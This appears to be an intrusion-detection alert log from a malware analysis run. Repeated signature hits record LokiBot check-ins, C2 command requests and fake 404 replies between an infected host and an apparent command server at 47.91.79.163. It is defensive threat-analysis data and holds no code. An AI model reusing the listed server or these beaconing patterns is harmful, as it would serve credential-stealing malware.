                                    12/03/20-10:03:06.983532TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982380192.168.2.347.91.79.163
                                    12/03/20-10:03:07.036550TCP2025483ET TROJAN LokiBot Fake 404 Response804982347.91.79.163192.168.2.3
                                    12/03/20-10:03:07.247568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.247568TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982580192.168.2.347.91.79.163
                                    12/03/20-10:03:07.307061TCP2025483ET TROJAN LokiBot Fake 404 Response804982547.91.79.163192.168.2.3
                                    12/03/20-10:03:07.514056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.514056TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982680192.168.2.347.91.79.163
                                    12/03/20-10:03:07.577130TCP2025483ET TROJAN LokiBot Fake 404 Response804982647.91.79.163192.168.2.3
                                    12/03/20-10:03:07.815653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.815653TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4982880192.168.2.347.91.79.163
                                    12/03/20-10:03:07.908293TCP2025483ET TROJAN LokiBot Fake 404 Response804982847.91.79.163192.168.2.3
                                    12/03/20-10:03:08.117953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.117953TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983080192.168.2.347.91.79.163
                                    12/03/20-10:03:08.178644TCP2025483ET TROJAN LokiBot Fake 404 Response804983047.91.79.163192.168.2.3
                                    12/03/20-10:03:08.390972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.390972TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983280192.168.2.347.91.79.163
                                    12/03/20-10:03:08.453232TCP2025483ET TROJAN LokiBot Fake 404 Response804983247.91.79.163192.168.2.3
                                    12/03/20-10:03:08.688532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.688532TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983480192.168.2.347.91.79.163
                                    12/03/20-10:03:08.751399TCP2025483ET TROJAN LokiBot Fake 404 Response804983447.91.79.163192.168.2.3
                                    12/03/20-10:03:08.977336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.2.347.91.79.163
                                    12/03/20-10:03:08.977336TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983680192.168.2.347.91.79.163
                                    12/03/20-10:03:09.036973TCP2025483ET TROJAN LokiBot Fake 404 Response804983647.91.79.163192.168.2.3
                                    12/03/20-10:03:09.259970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.259970TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983880192.168.2.347.91.79.163
                                    12/03/20-10:03:09.318355TCP2025483ET TROJAN LokiBot Fake 404 Response804983847.91.79.163192.168.2.3
                                    12/03/20-10:03:09.551736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.551736TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4983980192.168.2.347.91.79.163
                                    12/03/20-10:03:09.610619TCP2025483ET TROJAN LokiBot Fake 404 Response804983947.91.79.163192.168.2.3
                                    12/03/20-10:03:09.837842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.837842TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984180192.168.2.347.91.79.163
                                    12/03/20-10:03:09.896492TCP2025483ET TROJAN LokiBot Fake 404 Response804984147.91.79.163192.168.2.3
                                    12/03/20-10:03:10.292766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.292766TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984280192.168.2.347.91.79.163
                                    12/03/20-10:03:10.357725TCP2025483ET TROJAN LokiBot Fake 404 Response804984247.91.79.163192.168.2.3
                                    12/03/20-10:03:10.678499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.678499TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984480192.168.2.347.91.79.163
                                    12/03/20-10:03:10.771741TCP2025483ET TROJAN LokiBot Fake 404 Response804984447.91.79.163192.168.2.3
                                    12/03/20-10:03:11.071451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.071451TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984580192.168.2.347.91.79.163
                                    12/03/20-10:03:11.214334TCP2025483ET TROJAN LokiBot Fake 404 Response804984547.91.79.163192.168.2.3
                                    12/03/20-10:03:11.553112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.553112TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984680192.168.2.347.91.79.163
                                    12/03/20-10:03:11.615847TCP2025483ET TROJAN LokiBot Fake 404 Response804984647.91.79.163192.168.2.3
                                    12/03/20-10:03:11.821232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.821232TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4984880192.168.2.347.91.79.163
                                    12/03/20-10:03:11.875974TCP2025483ET TROJAN LokiBot Fake 404 Response804984847.91.79.163192.168.2.3
                                    12/03/20-10:03:12.190368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.190368TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985080192.168.2.347.91.79.163
                                    12/03/20-10:03:12.249257TCP2025483ET TROJAN LokiBot Fake 404 Response804985047.91.79.163192.168.2.3
                                    12/03/20-10:03:12.493744TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.493744TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985180192.168.2.347.91.79.163
                                    12/03/20-10:03:12.555351TCP2025483ET TROJAN LokiBot Fake 404 Response804985147.91.79.163192.168.2.3
                                    12/03/20-10:03:12.862106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.862106TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985280192.168.2.347.91.79.163
                                    12/03/20-10:03:12.924524TCP2025483ET TROJAN LokiBot Fake 404 Response804985247.91.79.163192.168.2.3
                                    12/03/20-10:03:13.235860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.235860TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985380192.168.2.347.91.79.163
                                    12/03/20-10:03:13.303885TCP2025483ET TROJAN LokiBot Fake 404 Response804985347.91.79.163192.168.2.3
                                    12/03/20-10:03:13.990149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.2.347.91.79.163
                                    12/03/20-10:03:13.990149TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985480192.168.2.347.91.79.163
                                    12/03/20-10:03:14.050435TCP2025483ET TROJAN LokiBot Fake 404 Response804985447.91.79.163192.168.2.3
                                    12/03/20-10:03:15.823745TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.823745TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985580192.168.2.347.91.79.163
                                    12/03/20-10:03:15.885562TCP2025483ET TROJAN LokiBot Fake 404 Response804985547.91.79.163192.168.2.3
                                    12/03/20-10:03:16.269414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.269414TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985680192.168.2.347.91.79.163
                                    12/03/20-10:03:16.327590TCP2025483ET TROJAN LokiBot Fake 404 Response804985647.91.79.163192.168.2.3
                                    12/03/20-10:03:16.708489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.708489TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985780192.168.2.347.91.79.163
                                    12/03/20-10:03:16.789518TCP2025483ET TROJAN LokiBot Fake 404 Response804985747.91.79.163192.168.2.3
                                    12/03/20-10:03:17.123306TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.123306TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985880192.168.2.347.91.79.163
                                    12/03/20-10:03:17.185949TCP2025483ET TROJAN LokiBot Fake 404 Response804985847.91.79.163192.168.2.3
                                    12/03/20-10:03:17.598132TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.598132TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4985980192.168.2.347.91.79.163
                                    12/03/20-10:03:17.878546TCP2025483ET TROJAN LokiBot Fake 404 Response804985947.91.79.163192.168.2.3
                                    12/03/20-10:03:18.277933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.277933TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986080192.168.2.347.91.79.163
                                    12/03/20-10:03:18.340693TCP2025483ET TROJAN LokiBot Fake 404 Response804986047.91.79.163192.168.2.3
                                    12/03/20-10:03:19.025662TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.025662TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986180192.168.2.347.91.79.163
                                    12/03/20-10:03:19.166356TCP2025483ET TROJAN LokiBot Fake 404 Response804986147.91.79.163192.168.2.3
                                    12/03/20-10:03:19.368860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.368860TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986280192.168.2.347.91.79.163
                                    12/03/20-10:03:19.428898TCP2025483ET TROJAN LokiBot Fake 404 Response804986247.91.79.163192.168.2.3
                                    12/03/20-10:03:19.879013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.879013TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986480192.168.2.347.91.79.163
                                    12/03/20-10:03:19.953105TCP2025483ET TROJAN LokiBot Fake 404 Response804986447.91.79.163192.168.2.3
                                    12/03/20-10:03:20.167098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.167098TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986580192.168.2.347.91.79.163
                                    12/03/20-10:03:20.230773TCP2025483ET TROJAN LokiBot Fake 404 Response804986547.91.79.163192.168.2.3
                                    12/03/20-10:03:20.635796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.635796TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986680192.168.2.347.91.79.163
                                    12/03/20-10:03:20.702595TCP2025483ET TROJAN LokiBot Fake 404 Response804986647.91.79.163192.168.2.3
                                    12/03/20-10:03:20.914107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.914107TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986780192.168.2.347.91.79.163
                                    12/03/20-10:03:20.975845TCP2025483ET TROJAN LokiBot Fake 404 Response804986747.91.79.163192.168.2.3
                                    12/03/20-10:03:21.409025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2025381ET TROJAN LokiBot Checkin4986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.409025TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986880192.168.2.347.91.79.163
                                    12/03/20-10:03:21.474463TCP2025483ET TROJAN LokiBot Fake 404 Response804986847.91.79.163192.168.2.3
                                    12/03/20-10:03:21.989441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2025381ET TROJAN LokiBot Checkin4986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.2.347.91.79.163
                                    12/03/20-10:03:21.989441TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4986980192.168.2.347.91.79.163
                                    12/03/20-10:03:22.047095TCP2025483ET TROJAN LokiBot Fake 404 Response804986947.91.79.163192.168.2.3
                                    12/03/20-10:03:22.262478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.262478TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987080192.168.2.347.91.79.163
                                    12/03/20-10:03:22.321959TCP2025483ET TROJAN LokiBot Fake 404 Response804987047.91.79.163192.168.2.3
                                    12/03/20-10:03:22.758574TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.758574TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987180192.168.2.347.91.79.163
                                    12/03/20-10:03:22.823090TCP2025483ET TROJAN LokiBot Fake 404 Response804987147.91.79.163192.168.2.3
                                    12/03/20-10:03:23.023042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.023042TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987280192.168.2.347.91.79.163
                                    12/03/20-10:03:23.081216TCP2025483ET TROJAN LokiBot Fake 404 Response804987247.91.79.163192.168.2.3
                                    12/03/20-10:03:23.528398TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.528398TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987380192.168.2.347.91.79.163
                                    12/03/20-10:03:23.585989TCP2025483ET TROJAN LokiBot Fake 404 Response804987347.91.79.163192.168.2.3
                                    12/03/20-10:03:24.023586TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2025381ET TROJAN LokiBot Checkin4987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.023586TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4987480192.168.2.347.91.79.163
                                    12/03/20-10:03:24.206701TCP2025483ET TROJAN LokiBot Fake 404 Response804987447.91.79.163192.168.2.3
                                    12/03/20-10:03:24.680367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.347.91.79.163
